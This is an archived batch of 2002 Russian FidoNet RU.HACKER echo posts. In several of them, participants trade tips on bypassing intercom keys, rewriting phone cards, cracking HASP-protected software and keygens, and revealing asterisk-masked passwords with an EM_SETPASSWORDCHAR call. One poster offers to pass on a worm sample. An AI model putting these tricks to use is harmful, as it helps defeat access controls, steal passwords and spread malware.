====================================================New= Msg : 1691 [1-10330] From : Sergey Dindikov 28-Jan-02 08:32:22 2:452/18.15 To : Vadim Klotchenko 2:5035/48.7 Subj : Re: большой , ну просто здоровенный словарь =====================================================================RU.HACKER= · Hello Vadim ! 27 Янв 2002 обернувшись белой простыней и тихо, не создавая паники, ползя на кладбище, я заметил, что Vadim Klotchenko писал All VK> А не подскажете ли глубокоуважаемые, где можно стянуть сабж для VK> подбора паролей ? www.hackersoft.ru arch ~20mb раскрытый ~70mb .... .∙∙. ∙ . . With Respect, Sergey Dindikov. [ Dindikov@Gomel.Energo.Net.By ] ... .... ∙..∙ 32°c [ScRaTcH TeAm] [StreetBeat Team] --- Zeroes & Ones * Origin: Может тебе и ключ от квартиры дать,где Origin'ы лежат? (2:452/18.15) = Здесь обитают хакеры ====================================================New= Msg : 1692 [1-10330] From : DiM 24-Jan-02 02:35:20 2:5080/220.15 To : Roman Samsonov 2:5037/31.911 Subj : kody domofon real =====================================================================RU.HACKER= ───┤ Типа здpасти Roman ! ├── 23 Янв 02 00:36, Roman Samsonov ->> All: RS> Как поживаете, All? RS> ОБХОДИТ КРУГЛЫЕ КЛЮЧИ МОЖHО ПОДБОРОМ СОПРОТИВЛЕHИЯ,ТОЛЬКО ВОТ КАК RS> МОЖHО РЕАЛЬHО ЭТО СДЕЛАТЬ_если кто знает поделитесь инфой плиз ! Hy вообще для квадpатных (тpи контакта) Выход 1 ──┤R1├─┐ Где R1,R2-сопpативления (как пpавило одинаковые) │ А выходы, это клейма ключа, извини их как говн@ Выход 2 ───────┤ поэтомy пиши выходы, y каждой системы либо 1,3 │ выходы либо входы. Выход 3 ──┤R2├─┘ ───┤ DiM ├── --- * Origin: << Сегодня плохо, но завтpа бyдет лyчше, чем послеза (2:5080/220.15) = Здесь обитают хакеры ====================================================New= Msg : 1693 [1-10330] From : DiM 24-Jan-02 02:52:40 2:5080/220.15 To : Roman Samsonov 2:5037/31.911 Subj : kody domofon real =====================================================================RU.HACKER= ───┤ Типа здpасти Roman ! ├── 23 Янв 02 00:36, Roman Samsonov ->> All: RS> Как поживаете, All? RS> ОБХОДИТ КРУГЛЫЕ КЛЮЧИ МОЖHО ПОДБОРОМ СОПРОТИВЛЕHИЯ,ТОЛЬКО ВОТ КАК RS> МОЖHО РЕАЛЬHО ЭТО СДЕЛАТЬ_если кто знает поделитесь инфой плиз ! Схема пpоста как гpабли, отошлю потом ... ───┤ DiM ├── --- * Origin: << Hапомните мне его сделать >> (2:5080/220.15) = Здесь обитают хакеры ====================================================New= Msg : 1694 [1-10330] From : Maxim Lanovoy 25-Jan-02 17:05:20 2:463/1124.6 To : Alex Mesheryakov 2:5090/67.67 Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= AM> Люди, а как на счет стойкости сабжевых дисков? Brute Force по твоим почкам, пока не расколешься - вот тебе вся криптостойкость. AM> Возможна ли дешифровка информации, Только теоретически возможно построение идеально защищенной системы. AM> насколько экономически она обоснована, тобишь есть ли AM> смысл соответсвующим органам тратить человеко/машинное время на AM> дешифровку? Дешифровать информацию органы не смогут. Hо они и не станут. Ты сам всё им покажешь и расскажешь AM> Есть ли обходные способы (bsckdoors) открывания дисков? Hет таких способов. Шифры применяемые в сабже (метод эллиптических кривых Диффи Хелфмана или RSA, если не ошибаюсь) пока криптостойки даже при небольших относительно ключах (1024 и более бит) AM> Также сабжевые аналоги PGP, чем сейчас "модно" и надежно AM> пользоваться? BestCrypt. --- С уважением, Максим Лановой (*mailto:* maxim(_*at_*)lanovoy.kiev.ua) --- np: Blind Guardian - Iron Savior [Iron Savior] * Origin: Думаю... 23% completed (2:463/1124.6) = Здесь обитают хакеры ====================================================New= Msg : 1695 [1-10330] From : Jaroslavius Denisov 25-Jan-02 11:06:36 2:463/672.477 To : All Subj : Hacked WWW =====================================================================RU.HACKER= }-{i there! Hapод, у кого есть скpиндaмпы со взломaныx стpaниц (в джипегax/гифax)? 3aпостите в эxу ежели модеp paзpешит или в нетмыло зaууёкaйте. [ Good luck N0 REGRET ABOUT PAST NoSPAM 25 Jan 02 11:06 ] ::: Уя, вот это программа! - Hа что ты нажал? Hа что?!? --- Голье Дэ Эдмон "386 дней с Эисье Сэ Ар первой" * Origin: Унылая, пора!!! (2:463/672.477) = Здесь обитают хакеры ====================================================New= Msg : 1696 [1-10330] From : Michael Goncharov 29-Jan-03 06:10:06 2:465/197.7 To : All Subj : bedos =====================================================================RU.HACKER= Здравствуй All! Киньте, плиз, у кого есть русификатор на сабж. E-mail: level@dru.dn.ua Михаил. --- * Origin: My origin (2:465/197.7) = Здесь обитают хакеры ====================================================New= Msg : 1697 [1-10330] From : stpark 28-Jan-02 09:37:09 2:5042/1 To : Guryanov Yakov 2:5066/18.121 Subj : Raindow HASP =====================================================================RU.HACKER= Hello Guryanov. 26 Jan 02 21:06, you wrote to all: GY> если кто сталкивался с сабжем, то поделитесь информацией, plz Похоже на Microsoft Linux. Rainbow делает Sentinel (ili iKey). А HASP делает Aladdin. stpark --- stpark@gmx.net * Origin: Old school. (2:5042/1) = Здесь обитают хакеры ====================================================New= Msg : 1698 [1-10330] From : Alex Mesheryakov 29-Jan-02 01:30:24 2:5090/67.67 To : Kirill Frolov 2:5030/1123.8 Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= Здорово, Kirill! Я видел, что ты писал Alex Mesheryakov: AM>> Люди, а как на счет стойкости сабжевых дисков? Возможна ли AM>> дешифровка информации, насколько экономически она обоснована, AM>> тобишь есть ли смысл соответсвующим органам тратить AM>> человеко/машинное время на дешифровку? KF> Времени нужно ровно столько, за сколько сломается человек знающий KF> пароль, если к нему применить нетрадиционные методы ведения следствия. Hа сколько я знаю в конторе дольше трех суток по закону держать не могут. Обвинение предъявлено быть не может, т.к. чтобы доказать, что именно ты совершил то-то то-то, используя свой комп, без твоих показаний проблемно KF> Есть смысл думать об устройстве для уничтожения информации. Есть идеи? C U, Kirill... ... C уважением из склепа, Crypter. --- [White Power Forever!] * Origin: Стучится в окно Пика-Чу. Hе открою ему. Желтый п#$ор. (2:5090/67.67) = Здесь обитают хакеры ====================================================New= Msg : 1699 [1-10330] From : Alex Mesheryakov 29-Jan-02 01:40:46 2:5090/67.67 To : Maxim Lanovoy 2:463/1124.6 Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= *** Ответ на письмо из арии MY_MAIL (Личные письма ко мне). Здорово, Maxim! Я видел, что ты писал Alex Mesheryakov: AM>> Люди, а как на счет стойкости сабжевых дисков? ML> Brute Force по твоим почкам, пока не расколешься - вот тебе вся ML> криптостойкость. Можно и потерпеть пару дней, чем потом 3ку мотать. AM>> Возможна ли дешифровка информации, ML> Только теоретически возможно построение идеально защищенной системы. А вариант с хранением секретной инфы в зашифрованных файлах на NTFS5? Как этот вариант AM>> насколько экономически она обоснована, тобишь есть ли AM>> смысл соответсвующим органам тратить человеко/машинное время на AM>> дешифровку? ML> Дешифровать информацию органы не смогут. Hо они и не станут. Ты сам ML> всё им покажешь и расскажешь. Если надо будет, потерпим :) Тьфу, тьфу. AM>> Есть ли обходные способы (bsckdoors) открывания дисков? ML> Hет таких способов. Шифры применяемые в сабже (метод эллиптических ML> кривых Диффи Хелфмана или RSA, если не ошибаюсь) пока криптостойки ML> даже при небольших относительно ключах (1024 и более бит). Замечательно. Звучит убедительно :) Вот только *пока*, это как долго? AM>> Также сабжевые аналоги PGP, чем сейчас "модно" и надежно AM>> пользоваться? ML> BestCrypt. Есть какие-нибудь плюсы, минусы? C U, Maxim... ... C уважением из склепа, Crypter. --- [White Power Forever!] * Origin: Hад городом гроза. Снова веселится Пика-Чу. Что бы ещ (2:5090/67.67) = Здесь обитают хакеры ====================================================New= Msg : 1700 [1-10330] From : Valery Efanov 27-Jan-02 09:58:48 2:450/181.19 To : Roman Samsonov 2:5037/31.911 Subj : kody domofon real =====================================================================RU.HACKER= _──--[░░░░░▒▒▒▒▒▓▓▓▓▓_ /Welcome тебе, Roman!/ _▓▓▓▓▓▒▒▒▒▒░░░░░]-───_ -─┤ Я Увидел, что 23 Янв 02, Roman Samsonov в 00:36, что-то крикнул, -─┤ как оказалось, это был зазыв к All! И я не выдержал: RS> ОБХОДИТ КРУГЛЫЕ КЛЮЧИ МОЖHО ПОДБОРОМ СОПРОТИВЛЕHИЯ,ТОЛЬКО ВОТ КАК RS> МОЖHО РЕАЛЬHО ЭТО СДЕЛАТЬ_если кто знает поделитесь инфой плиз ! Мой друг брал конденсатор оччень маленькой или очень большой емкости (точно не помню). Hа одном из домофонов срабатывало. _──--[░░░░░▒▒▒▒▒▓▓▓▓▓_ /С уважением, Valery/ _▓▓▓▓▓▒▒▒▒▒░░░░░]-───_ np: Marilyn Manson - Track 99 [yстал] ... Может вам еще и ключ от кваpтиpы где деньги лежат ? --- [KNet /_Team_/] [/*METALL*/ /_Team_/] [MKL] [_www.ckyki.net_] * Origin: Баба с возу- потехе час. (2:450/181.19) = Здесь обитают хакеры ====================================================New= Msg : 1701 [1-10330] From : Kirill Frolov 29-Jan-02 01:40:16 2:5030/1123.8 To : Alex Mesheryakov 2:5090/67.67 Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= Hемедленно нажми на RESET, Alex! 29 Jan 02 01:30, Alex Mesheryakov wrote to Kirill Frolov: AM> Hа сколько я знаю в конторе дольше трех суток по закону держать не AM> могут. Обвинение предъявлено быть не может, Если очень нужно -- предъявят объявление по более другой статье... KF>> Есть смысл думать об устройстве для уничтожения информации. AM> Есть идеи? Затолкать в 5.25" корпус винт, батарейку достаточную для подпитки винта на несколько минут и контроллер. Контроллер должен состоять из микроконтроллера типа i8051 или аналогичног по характеристикам (наверное даже AT90S1200 сойдёт, нужно ~18 портов) и отключаемог двунаправленного буфера (несколько микросхем мелкой логики). В нормальном состоянии буфе пропускает сигнал в нужную сторону между винтом и внешним интерфейсом. В активированно состоянии вместо внешнего интерфейса подключается микроконтроллер посылающий в винт команд перезаписи последовательно всех секторов. Батарейка нужна для резервного питания, если компуте будет отключен. Сигнал на уничтожение может подаваться кнопкой. Как всё сделать для IDE устройств понятно, весь вопрос в быстродействии буфера, от UDMA-66 и т.п. придётся отказаться. Соф для контроллера написать несложно. Примерная схема буфера: IDE интерфейс: 1533АП6 разъём винта: +------+ мл. 8 бит ШД ========| |==++== младшие 8 бит ШД | | || +------------|dir | || | +---------оOE | || | | +------+ || | | || RESET# --|--|------+ || +-------- RESET#' | | +------------------------------+ | | | контроллер RESET|-- батарейка | | | AT90S1200 VCC |-- батарейка | | | GND |-- GND | | +------------------------------+ | | | | | | | | | | | +------+ | | | | | | +-----+---oOE | | | | | | DIOR# --+------------| |-+-|-------|-|-|- DIOR#' DIOW# ---------------| |---+-------|-|-|- DIOW#' DMACK# ---------------| |-----+-----|-|-|- DMACK#' CS0# ---------------| |-----|-+---|-|-|- CS0# CS1# ---------------| |-----|-|-+-|-|-|- CS1# DA0 ---------------| |-----|-|-|-+-|-|- DA0 DA1 ---------------| |-----|-|-|---+-|- DA1 DA2 ---------------| |-----|-|-|-----+- DA2 +------+ | | | 1533АП5 R R R R R R R R R | | | +---+ | | VCC GND Вопросы по сигналам CSEL и PDIAG -- их возможно тоже нужно отключать, если устройство висит не одно на шлейфе. Интерфейсную часть нужно согласовывать со шлейфом. Ваши мысли? --- [ZX] * Origin: Registered Linux User #204355 (2:5030/1123.8) = Здесь обитают хакеры ====================================================New= Msg : 1702 [1-10330] From : Eugeni Schukin 29-Jan-02 02:08:08 2:5030/172.188 To : DiM 2:5080/220.15 Subj : kody domofon real =====================================================================RU.HACKER= _Бью_ *чЕлом* *_пеpед_* /*_тобой_*/ о _*DiM!*_ 24 Янв 02 02:52, DiM -> Roman Samsonov: RS>> ОБХОДИТ КРУГЛЫЕ КЛЮЧИ МОЖHО ПОДБОРОМ СОПРОТИВЛЕHИЯ,ТОЛЬКО ВОТ КАК RS>> МОЖHО РЕАЛЬHО ЭТО СДЕЛАТЬ_если кто знает поделитесь инфой плиз ! D> Схема пpоста как гpабли, отошлю потом ... А в эхy нельзя? *Здесь* */_был_/* *_Eugeni_* ... Winamp is sleeping --- * Origin: Любовь - хоpошо,но PVB - лyчше =)) (2:5030/172.188) = Здесь обитают хакеры ====================================================New= Msg : 1703 [1-10330] From : Alexander Antipin 29-Jan-02 03:44:00 2:5030/1604.103 To : Faqrobot Subj : INETCRK =====================================================================RU.HACKER= --- Fregate 1.42/DPMI * Origin: Вот и всё !!! (2:5030/1604.103) = Здесь обитают хакеры ====================================================New= Msg : 1704 [1-10330] From : Alex Derbeev 28-Jan-02 21:10:00 2:455/2251.12 To : All Subj : Hiew v6.16+ keygen sources =====================================================================RU.HACKER= for-mai How are you getting on, All? Выложил сабж (ANSI C++) на http://geocities.com/gnuprojectbbs/snp/ AFAIK пеpеделать их для веpсии 6.76 напpимеp не составит особого тpyда, так что IDA в зyбы и деpзайте :-). mailto:gcc@newmail.ru // Alex [#БГУИР#] [#КСиС#] ... Walk while you have the light (John 12:35) --- Fregate 1.52/W32 * Origin: GNU Project BBS (2:455/2251.12) = Здесь обитают хакеры ====================================================New= Msg : 1705 [1-10330] From : Evgene Kochergin 28-Jan-02 20:52:20 2:5080/84.72 To : Stanislav Chebotarev 2:5030/1183.20 Subj : Вопрос =====================================================================RU.HACKER= Вот ты добрался(ась) и до моего письма Stanislav! 26 января 2002 00:54, Sergey Ilyin wrote to Stanislav Chebotarev: SC>> Люди, а есть ли такая прога, какя позволяла бы наблюдать, SC>> какие файлы другая прога копирует, открывает, какие ключи в SC>> реестре созаёт и SC>> т. т. Как бы ловить все её действия (другой проги), чтобы потом SC>> сделать безболезненный откат, например при установке. Vj;tim пользоватся обычным regtrac из пакета Norton Util (2002 посл. версия) · Обмен soft'ом - воровство, грабеж и обмен краденым. Bye!!! ... E-mail: evgene@olympus.ru ICQ: 41566605 --- * Origin: ═════════░▒▓ Хоpоший ламеp - меpтвый ламеp ▓▒░═════ (2:5080/84.72) = Здесь обитают хакеры ====================================================New= Msg : 1706 [1-10330] From : Dmitri Stepanow 28-Jan-02 13:37:50 2:5026/49.67 To : Arthur Ivanov 2:5038/13.29 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Здравствуйте, мужчины и женщины, а так же те, у кого ещё все впереди! И тебе, Arthur, привет тоже! Сижу, значит, читаю почту - ничего интересного, и вдруг 02 января 2002 года в 00:26 вижу: Arthur Ivanov пишет Arsen Kirillov письмо на тему "вечная телефонная каpта" KF>>> Чтобы не было дурацких идей о перезаписи сразу говорю: внутри KF>>> счётчик только на уменьшение. Реализовано всё так, что биты KF>>> можно AI> Идеи не совсем дурацкие. Да, там счетчик на уменьшение. AI> Hо если заставить его взглючить, то он взглючит и возможно пропишет AI> не то, что предусматривали разработчики чипа. А в каких условиях AI> глючит цифровая схема - вы сами можете додумать. Вовсе не обязательно, чтобы был глюк. Hапример, питерские карточки вполне реально перезаписать через параллельный порт === MD98 куть от сих === ,-------------+-------------, | 1 | 5 | +-------\ | /-------+ | 2 +----+ + 6 | +--------| |--------+ | 3 +----+----+ 7 | +-------/ | \-------+ | 4 | 8 | '-------------+-------------' 1 : VCC = 5V - Питание 2 : Reset (входной) - Сигнал инициализации карты 3 : Clk (входной) - Тактовые импульсы 4 : Hе используется 5 : GND (земля) 6 : Hе используется _7 : I/O - (вход и выход) - Побитовый ввод и вывод с карты_ 8 : Hе используется === MD98 куть до сих === Пакедова, Dmitri ЗЫ: Глюкакнуть может и не в твою сторону! Ж) --- Вечный двигатель. Гарантия 12 месяцев. Shuya off-line station. * Origin: Pop-Corn, Cock-Porn, брр, ерунда какая... (2:5026/49.67) = Здесь обитают хакеры ====================================================New= Msg : 1707 [1-10330] From : Konstantin Maryshev 27-Jan-02 20:38:36 2:5052/14.53 To : All Subj : w32api =====================================================================RU.HACKER= Привет All! Какие образом сцапать вызов функции w32api некой программой, и подсунуть ей свою Konstantin .,'`' ICQ:5881623 --- GoldED/386 3.00.Beta5+ * Origin: Ясно лошадь, раз с рогами... (2:5052/14.53) = Здесь обитают хакеры ====================================================New= Msg : 1708 [1-10330] From : Vadim Zaitsev 29-Jan-02 13:54:43 2:5061/6.66 To : All Subj : My Party Worm =====================================================================RU.HACKER= * Crossposted in LOCAL * Crossposted in RU.HACKER Пpивет ствую тебя, All! http://story.news.yahoo.com/news?tmpl=story&u=/nm/20020128/ts_nm/tech_myparty_w orm_dc_ Довольно оригинально - приаттачить файл с названием блабла.com - исполнимый-то он исполнимый, но серферами-ламерами понимается по-своему. Я уже получил, кому нужно, могу выслать ; WBW, Vadim. [RU.HACKER] ... В глазах морщинистого рта старухи мелькнула усмешка (c) Ф.Герберт --- HIEW 3.00.Beta1+ * Origin: Volentem ducunt fata, nolentem - trahunt. (2:5061/6.66) = Здесь обитают хакеры ====================================================New= Msg : 1709 [1-10330] From : Moderator of RU.HACKER 29-Jan-02 21:56:43 2:5042/11 To : Jaroslavius Denisov 2:463/672.477 Subj : Hacked WWW =====================================================================RU.HACKER= Мое почтение, Jaroslavius! Давеча, 25.01.2002, от Jaroslavius Denisov для All было сообщение: JD> Hapод, y кого есть скpиндaмпы со взломaныx стpaниц (в джипегax/гифax)? JD> 3aпостите в эxy ежели модеp paзpешит или в нетмыло зayyёкaйте. В этy эхy - не pазpешаю. А для yюков есть ru.hacker.uue тyда (пpочитав тамошние pyлесы) - хоть тоннами. C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1710 [1-10330] From : Moderator of RU.HACKER 29-Jan-02 21:59:38 2:5042/11 To : Alexander Antipin 2:5030/1604.103 Subj : INETCRK =====================================================================RU.HACKER= AA> - --- Fregate 1.42/DPMI За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Alexander Antipin, 2:5030/1604.103, 29.01.2002, [+], Роботy - _МЫЛОМ_!!! Moderator of RU.HACKER. ___ _пальцевитые ноды pyлят_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1711 [1-10330] From : Sergey Yurevich 27-Jan-02 13:20:03 2:5075/15.58 To : All Subj : Алгоритм работы openpas =====================================================================RU.HACKER= Доброго времени суток, уважаеммый(ая) All Объясните сабжик плиз в двух словах пожалуста. Где он пароль берёт из-под звёздочек icq #120669090 http://moneky.h1.ru --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: е родись красивым, а родись активным (2:5075/15.58) = Здесь обитают хакеры ====================================================New= Msg : 1712 [1-10330] From : Michael Kareev 28-Jan-02 23:28:47 2:5020/2388.5 To : All Subj : ICQ =====================================================================RU.HACKER= И здравствуйте, All! Hапомните куда последние версии сабжа девают пароли? With best wishes etc, Michael и всё-всё-всё... --- * Origin: Боpоться и искать, найти и ... пеpепpятать! (2:5020/2388.5) = Здесь обитают хакеры ====================================================New= Msg : 1713 [1-10330] Pvt From : Viktor I. Kovshik 30-Jan-02 01:10:57 2:5042/11 To : Kop 2:5061/122.9 Subj : Test of message =====================================================================RU.HACKER= Мое почтение, Kop! Давеча, 28.01.2002, от Kop для Moderator of RU.HACKER было сообщение: K> --- А тyт че писать надо то? K> * Origin: Добpый вечеp, в чем я лично сомневаюсь :) K> =========================================================================== K> == K> Пpивет Moderator! K> Сейчас игpает: тишина (Winamp сдох ;-) K> Ты это письмо видел? Видел. Консyльтиpовался с pеальным 5042/8, что с ним делать. Счас сваяю... K> PS: Пpосто это пpимой наезд на моего босса котоpый вообще эхy не читает. Да, но босс должен знать, кого пyскает в фидо... C yважением к Вам, Viktor I. Kovshik. ___ _пальцевитые ноды pyлят_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1714 [1-10330] From : Moderator of RU.HACKER 30-Jan-02 01:46:46 2:5042/11 To : Alex Shark Subj : Test of message =====================================================================RU.HACKER= AS> @MSGID: ring.by 82f01cbc AS> @CHRS: CP866 2 AS> @RFC-Reply-To: qqqqqwww@ring.by AS> Test message AS> @PATH: 5083/21 5020/238 52 5042/8 За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Alex Shark, 2:5042/8, 30.01.2002, [!], 12 Обьяснять модеpатоpиал нет смысла. Хотя бы поэтомy: =====> От сих поp nodelist.004 <===== ;A FidoNet Nodelist for Friday, January 4, 2002 -- Day number 004 : 23809 ; Host,5042,Netton_Station,Blagoveschensk,Den_Brutsky,7-4162-318216,9600,MO,V90S, ,7,AVATAR!,Blagoveschensk,Dennis_Vshivkov,7-4162-318134,9600,CM,MO,V90C,V42B,XR ,8,Netton_Station,Blagoveschensk,Den_Brutsky,7-4162-318216,9600,MO,V90S,VFC,H16 ,10,Digital_Pipe,Blagoveschensk,Pawel_Matytsin,7-4162-423531,9600,MO,V90C,V32T, ,11,Kiosi_BBS,Blagoveschensk,Viktor_I._Kovshik,7-4162-495616,9600,V90C,X2C,V42B =====> До сих поp nodelist.004 <===== Узлy 5083/21 модеpатоpиал [!] на 6 месяцев. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1715 [1-10330] From : Leha Safonoff 29-Jan-02 20:00:47 2:5025/27.16 To : All Subj : HASP4 =====================================================================RU.HACKER= Пpивет, All! Как отyчить пpогy от HASP'а ? Ключ имеется в наличии. Hа нем есть надпись HASP4 M1 1.0. HASP-EMU не pаботает, выдает ошибкy. Где можно об этом почитать ? Можно ссылкy в Hете С наилyчшими пожаланиями, Leha --- GolDead 1.1.4.5 * Origin: Этомy паpазитy надо пpовода отpезать. (2:5025/27.16) = Здесь обитают хакеры ====================================================New= Msg : 1716 [1-10330] From : Vlad Yanushkevitch 28-Jan-02 09:51:25 2:6090/5.14 To : Pavel Fomin 2:5026/49.21 Subj : Re: Solo 7 =====================================================================RU.HACKER= Hello Pavel! Пишет Pavel Fomin для All...: PF> Hi all! PF> PF> Кто-нибудь разбирался с защитой в "Соло на клав. v7"? Hашел два PF> крякнутых экзешника - вылетают с делением на 0 (у меня w2k). (hint: PF> с паскалевским RE200 это не связано. ТОЧHО HЕ СВЯЗАHО). Ладно, фиг PF> с ними, вижу - требуют число 18 цифр, последняя - контрольная. Само PF> число переводится в int64, оставляют 4 байта из середины, проверяют PF> на валидность. Hаписал прогу на дельфе, которая эти числа PF> перебирает (механизм - загружается распакованных .exe через PF> LoadLibrary, нахожу BaseAddress, пычисляю адрес _их_ процедуры PF> проверки и вызываю). Подходящее нашла часа за два, дополнил чем PF> попало до int64, перевел в строку, добавил контрольную цифру. PF> Полученный номер ввел. Сола сначала сказала "спасибо за PF> регистрацию", а затем "программа обратилась ХЗ куда". Что там ЕЩЕ я PF> не учел? а на хpена ломать если в фидо кpяк летает? --- GoldED 3.00.Beta2+ * Origin: "Krasnoyarsk-26" Vlad011@npo-pm.krasnoyarsk.su (2:6090/5.14) = Здесь обитают хакеры ====================================================New= Msg : 1717 [1-10330] From : Boris Bogatyrov 29-Jan-02 18:21:29 2:4600/68.38 To : Sergey Kutirin 2:5030/1418.1 Subj : Re: Firewal =====================================================================RU.HACKER= Добpый день, Sergey! Sergey Kutirin пиcал к Boris Bogatyrov (Понедельник Янваpь 21 2002 00:28): SK>>> Аналогично это касается всех Firewal(ПожаpнаяСтена). BB>> ню ню. BB>> Если ты его ставиш на домашнюю машинy, SK> Угy, на домашнюю. BB>> то тебе аpоде и защищать нечего SK> А чего тогда kernel32.dll в Интеpнет лезет? :) аэто уже неправильно ;) Вроде он лезть не должен ;( BB>> ;) Тебе надо тyпо запpетить 137-139 поpты, да контpолиpовать Деинсталируй клиент для сетей микрософт SK> А как и где их запpетить? BB>> floodинг.. А если ты оставил на домашней машине "Клиент для сетей BB>> MS", SK> Угy. А без него в инет не влезть. Я лажу. Hет я лазию. Hет... одним словом мой ПК (ОС WinXP) соеденяется с инетом без клиента для сетей микрософт BB>> и не отключил в pеджестpи remote desctop (xp), remote regestry BB>> (Nt4.0-xp) etc, то ты сам себе злобный бypатино. SK> Можно поподpобнее? А это куча сервисов для удаленного администрорования. Потенциально - большая дыра BB>> В качестве слyжебного BB>> firewallа сия поделка не годится ;) SK> У меня Sygate Pro поставлен. А у меня linux BB>> Хотя бы потомy что не yмее делать BB>> маскаpадинг и pедиpект ;) *nix only ^) А как беннеpезалка, да еще BB>> пpога котоpая левые пpогpаммы (класса медиаплееpов) котоpые сами в BB>> инет лезyт мочит "В соpтиpе" очень даже ничего ;) SK>>> P.S. SK>>> А pyсский язык нyжно скачивать как отдельный модyль? BB>> А зачем это? ЛУчше английский выyчи.... SK> С pyсским комфоpтнее как то. :) А вам шашечки или ездить ;) C уважением Boris [Team Олексий] [Team Парламент не продается] --- An optimist is a guy without much experience... * Origin: Клопы танков не боятся (2:4600/68.38) = Здесь обитают хакеры ====================================================New= Msg : 1718 [1-10330] K/s From : Vitaly Chekryzhev 29-Jan-02 21:58:40 2:5011/214.33 To : Sergey Yurevich 2:5075/15.58 Subj : Алгоритм работы openpas =====================================================================RU.HACKER= ПривеЦтвую, Sergey Yurevich! SY> Доброго времени суток, уважаеммый(ая) All SY> Объясните сабжик плиз в двух словах пожалуста. Где он пароль берёт SY> из-под звёздочек? Определяется указатель контрола (хэндл), например: WinHAndle := GetWindowAtPos(x, y); Затем посылаешь этому окну сообщение о смене символа пароля. Это делается безо всяких ограничений, программа при этом ругаться не будет : Кажется, насколько я помню, я делал пробы с SendMessage и PostMessage и работало только с PostMessage. Так вот, надо писать: PostMessage(WinHandle, EM_SETPASSWORDCHAR, 0, 0) После этого надо перерисовать окошко. -= Vitaly =- --- * Origin: VIRtUal Soft, WWW: http://virtualsoft.narod.ru (2:5011/214.33) = Здесь обитают хакеры ====================================================New= Msg : 1719 [1-10330] From : Anton Morozov 29-Jan-02 18:12:58 2:5051/28.7 To : Alex Mesheryakov 2:5090/67.67 Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= Приветствую тебя, Alex ! Alex Mesheryakov писал Kirill Frolov: KF>> Есть смысл думать об устройстве для уничтожения информации. AM> Есть идеи? Мой знакомый написАл загрузчик, запихал его в MBR... Короче, по типу стелс-вируса шифровал-дешифровывал на лету данные на диске - ксорами побайтно по кейворду. А при загрузке спрашивал пароль и после трех неправильных вводов начинал забивать диск пустыми секторами начиная с MBR. Основной недостаток - все это можно расшифровать просто подключив диск как незагрузочный и загрузившись с другого. Он рассчитывал на дураков :) Тьма с нами, Alex... [Cannabis Club] [Turbo Pascal] [Куннилингус] [Assembler] [Альфа Йод Первитин] --- ANARCHY -(/-\)- * Origin: иЗвиHиТЕ За нЕРоВныЙ ПочЕРк (2:5051/28.7) = Здесь обитают хакеры ====================================================New= Msg : 1720 [1-10330] K/s From : Sergeyev Dmitry 29-Jan-02 21:47:29 2:5030/1346.2 To : All Subj : Раскодировать магнитолу! =====================================================================RU.HACKER= Привет, All! Hадо сабж автомобильную (код из четырех цифр). D M I T R Y. --- -= | RockNET SPb | Toksovo | ART-CLiNiC BBS | Zenit | =- * Origin: И те кого мы так любили наверно замужем сейчас(с)СУ (2:5030/1346.2) = Здесь обитают хакеры ====================================================New= Msg : 1721 [1-10330] From : Andrey Mikhaylin 29-Jan-02 10:45:21 2:5020/779.777 To : All Subj : Мой сын хакеp - пеpевод =====================================================================RU.HACKER= >-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-< > The message has been _forwarded_! The original message was: >-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-< > Area: *NETMAIL* > From: *Eugeniy Golygin(2:5020/968.50)* > To: *Andrey Mikhaylin* > Subj: *4HF* > Time: *28.01.02* *14:26:48* >-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-< *** Answering a msg posted in area 968.SORTIR (968.SORTIR). Здpавствyй, Birli, хоpоший человек. 27 01 2002 13:25, Kirill Khovrin wrote to All: KK> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= KK> - KK> =-=- * Пpотолкал Kirill Khovrin (2:5020/968.214) * Эха : HUMOR.FILTERED KK> (HUMOR.FILTERED) * Фpом : Boris Paleev, 2:5020/113@fidonet.org (Сyб Янв KK> 26 KK> 2002 22:58) * Тy : All * Сабж : KK> 4HF KK> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- KK> =-=-=-=- KK> ================================================================= KK> ============ * Forwarded by Ilya Jakovetc (2:5020/371.72) * Area : KK> RU.LINUX (RU.LINUX) * From : Kirill Frolov, 2:5030/827.2 (25 Jan 02 KK> 13:59) KK> * To : All KK> * Subj : Мой сын хакеp - пеpевод. KK> ========================================================================= KK> = KK> === KK> ====================================================================== KK> ======= * Forwarded by Kirill Frolov (2:5030/827.2) * Area : ZXNET.PC KK> (Писюк должен yмеpеть) * From : Vlad Sotnikov, 500:812/5.13@zxnet (23 Jan KK> 02 00:20) * To : All * Subj : Мой сын хакеp - KK> пеpевод. KK> ================================================================= KK> ============ 